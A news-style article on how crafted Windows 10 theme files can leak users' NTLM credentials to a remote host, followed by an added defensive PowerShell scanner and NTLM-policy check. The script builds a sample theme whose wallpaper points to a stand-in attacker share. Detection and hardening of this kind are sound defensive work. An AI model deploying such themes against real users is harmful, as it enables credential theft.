A security researcher has shown that specially crafted Windows 10 themes can be used to harvest users' Windows credentials in the form of NTLM hashes, in an attack reported as "pass-the-hash" (more precisely, NTLM credential harvesting: the captured hash can be cracked offline or relayed). This is possible because of the way the operating system loads custom themes, which may reference resources on remote hosts.
Windows 10 Custom Themes Can Be Abused And Used To Steal Users' Data
Windows 10 allows users to install custom themes, and this has recently been shown to be an entry point for abuse. The warning came from security researcher Jimmy Bayne, who found a loophole that attackers can take advantage of whenever a theme is obtained from a third-party site or repository. The researcher notes that a malicious theme can be used to execute what the report calls a Pass-The-Hash attack.
The attack works by creating a theme whose .theme file points one of its resources, typically the desktop wallpaper, at a location controlled by the attacker that demands authentication. When the theme is activated, Windows tries to fetch that resource and, because the path is remote, automatically authenticates to the attacker's server on the user's behalf. No malware code inside the theme and no fake login form are needed; the operating system's own handling of remote paths does the work.
The .theme file associated with a given theme is a plain INI-style text file, and its wallpaper setting can be changed from a local image to a remote path such as a network share or a web address. When Windows follows that path and the remote host asks for authentication, it sends the logged-in user's account name together with an NTLM authentication response derived from the password hash. That hash cannot simply be decrypted, but NTLM responses captured this way can be cracked offline with ordinary password-cracking software, so a weak or common password is recovered quickly, and the response can also be relayed to other services that accept NTLM. Such attacks are dangerous because they can be combined with other malware to coordinate more advanced infections.
Possible countermeasures for administrators include blocking or re-associating the theme file extensions (.theme, .themepack and .desktopthemepackfile) so that users cannot install themes from untrusted sources. Where a machine does not need to authenticate to remote hosts with NTLM, the Group Policy setting "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" can be set to "Deny all" to stop the credentials from being sent. However, this can interfere with enterprise setups that still rely on NTLM for remote logins, so it should be audited before it is enforced. The issue was reported to Microsoft, but at this moment it will not be fixed, as the company said that this behaviour is a "feature by design".
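The following PowerShell script is an added example, not code from the original article or from the researcher's own write-up. It shows both halves of the story above: how the wallpaper entry in a .theme file can point off-host (using a constructed sample theme written to the temp directory, with a made-up host name), how to scan the usual theme locations on a machine for such entries, and how to check the "Restrict NTLM: Outgoing NTLM traffic to remote servers" setting, which is stored as the RestrictSendingNTLMTraffic value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0 (0 = allow all, 1 = audit, 2 = deny all). The scanner only reads plain .theme files; a .themepack is a CAB archive wrapping a .theme and would need to be extracted first.

```powershell
# Added example: detect off-host wallpaper paths in .theme files and report
# the outgoing-NTLM policy. Not part of the original article.
# Assumption: a .theme file is INI text whose [Control Panel\Desktop]
# section carries a Wallpaper= value (true for Windows theme files).

function Get-ThemeWallpaperPath {
    param([Parameter(Mandatory)][string]$Path)
    $section = $null
    foreach ($line in Get-Content -LiteralPath $Path) {
        $t = $line.Trim()
        if ($t -match '^\[(.+)\]$') { $section = $Matches[1]; continue }
        if ($section -eq 'Control Panel\Desktop' -and $t -match '^Wallpaper\s*=\s*(.*)$') {
            return $Matches[1].Trim()
        }
    }
    return $null
}

function Test-RemoteWallpaper {
    param([string]$Wallpaper)
    if (-not $Wallpaper) { return $false }
    # A UNC path (\\host\share or WebDAV-style \\host@80\...) or an http(s)
    # URL makes Windows contact another host when the theme is applied,
    # which is where the NTLM authentication leaves the machine.
    return ($Wallpaper -match '^\\\\' -or $Wallpaper -match '^https?://')
}

# Constructed sample: a theme whose wallpaper lives on an attacker-controlled
# share. The host name is made up for the example.
$sample = Join-Path $env:TEMP 'suspicious.theme'
@"
[Theme]
DisplayName=Totally Normal Theme

[Control Panel\Desktop]
Wallpaper=\\attacker.example.invalid\share\wallpaper.jpg
WallpaperStyle=10
"@ | Set-Content -LiteralPath $sample

$wp = Get-ThemeWallpaperPath -Path $sample
'{0}: Wallpaper={1} remote={2}' -f $sample, $wp, (Test-RemoteWallpaper $wp)

# Scan the standard per-user and system theme folders for the same pattern.
$themeDirs = @("$env:LOCALAPPDATA\Microsoft\Windows\Themes",
               "$env:WINDIR\Resources\Themes")
Get-ChildItem -Path $themeDirs -Filter *.theme -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object {
        $w = Get-ThemeWallpaperPath -Path $_.FullName
        if (Test-RemoteWallpaper $w) { "REMOTE WALLPAPER: $($_.FullName) -> $w" }
    }

# Countermeasure check: "Network security: Restrict NTLM: Outgoing NTLM
# traffic to remote servers" (0 = allow all, 1 = audit all, 2 = deny all).
$key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
$val = (Get-ItemProperty -Path $key -Name RestrictSendingNTLMTraffic `
        -ErrorAction SilentlyContinue).RestrictSendingNTLMTraffic
switch ($val) {
    2       { 'Outgoing NTLM to remote servers: Deny all (theme-based hash capture blocked)' }
    1       { 'Outgoing NTLM to remote servers: Audit all (events logged, traffic still sent)' }
    default { 'Outgoing NTLM to remote servers: Allow all (default); audit first, then consider Deny all' }
}

# To enforce from an elevated prompt (test NTLM-dependent services first):
# Set-ItemProperty -Path $key -Name RestrictSendingNTLMTraffic -Value 2 -Type DWord
```

Run the script as a normal user to inspect theme files and read the policy; only the commented Set-ItemProperty line needs elevation. Setting the value to 1 first and reviewing the resulting NTLM audit events is the safer way to find out which services would break under "Deny all".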